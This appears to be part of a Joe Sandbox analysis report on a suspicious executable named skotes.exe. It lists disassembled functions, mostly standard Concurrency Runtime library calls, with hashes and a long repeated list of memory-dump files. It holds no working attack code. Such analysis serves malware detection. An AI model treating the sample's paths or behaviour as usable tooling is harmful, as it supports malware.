__EH_prolog3_GS.LIBCMT ref: 0041ECED
Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0041ED17

Part of subcall function 0041F3DD: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0041F3FA

__alloca_probe_16.LIBCMT ref: 0041ED53
Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 0041ED94
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0041EDC6

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__alloca_probe_16
String ID:
API String ID: 2568206803-0
Opcode ID: 9df4acfc658845fb17537b70fe12277229255bd95a289e64e7df339151908351
Instruction ID: e5ba4aa972b5b687e82aeba40850cce8f465bb6681a4cf65264b7c2e3798f256
Opcode Fuzzy Hash: 9df4acfc658845fb17537b70fe12277229255bd95a289e64e7df339151908351
Instruction Fuzzy Hash: 3C31A3B5E001068BCB14DFAAD5415EEB7B4EF49314F64406FE805E7351DB389D82C799

Function 0042D2B9 Relevance: 7.6, APIs: 5, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::ReferenceCountedQuickBitSet::InterlockedSet.LIBCONCRT ref: 0042D344
ListArray.LIBCONCRT ref: 0042D367
Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0042D370
ListArray.LIBCONCRT ref: 0042D3A8
Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0042D3B3

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$ArrayListVirtual$ActiveAvailableBase::CountedInterlockedMakeProcessorProcessor::QuickReferenceSchedulerSet::
String ID:
API String ID: 4212520697-0
Opcode ID: dbbee29197d4f015cd116657c615d5ebbad778b6ff02e67a43618d59b8c9b1a5
Instruction ID: e2d6a87ab29929415420c0da8993e1b4fc79132de3196d9f699f4acd0bbfdcc7
Opcode Fuzzy Hash: dbbee29197d4f015cd116657c615d5ebbad778b6ff02e67a43618d59b8c9b1a5
Instruction Fuzzy Hash: 3031B475B00220EFCB05DF55D484BAEB7A5BF88314F54419AEC069B352CB78ED41CB96

Function 004286C9 Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 004286EE

Part of subcall function 0041EAD0: _SpinWait.LIBCONCRT ref: 0041EAE8

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 00428702
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00428734
List.LIBCMT ref: 004287B7
List.LIBCMT ref: 004287C6

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: 077f98613c2620de7065ed2d0a0cf93478308c9c6d3ed21310d4f5dedee47172
Instruction ID: 462aa756160b9a796e7fec1675da630e13b8ae80002d108a4576a0d2cee0735b
Opcode Fuzzy Hash: 077f98613c2620de7065ed2d0a0cf93478308c9c6d3ed21310d4f5dedee47172
Instruction Fuzzy Hash: C9318832A02265DFCB14EFA5E9816DEB7B1BF44308FA4406FD80167242CB79AD05CB99

Function 0043182A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 004318A4
Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 004318EB

Strings

pContext, xrefs: 0043189C

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 3390424672-2046700901
Opcode ID: e95cf8ccf1556caaf72762b1807beb7f872c2aa3a091a48244363160f3292fa7
Instruction ID: d01a77f2ab9abe46547ca181dc4035302de0eae64105b64324a031690df06c10
Opcode Fuzzy Hash: e95cf8ccf1556caaf72762b1807beb7f872c2aa3a091a48244363160f3292fa7
Instruction Fuzzy Hash: 3421EA35B006159BCB19B765D895ABD73A5BF98338F04112BE411872E1CB6CAC428A9D

Function 0043DFE3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 85COMMON

Download Yara Rule

Strings

6C, xrefs: 0043E034
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, xrefs: 0043DFE8

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID:
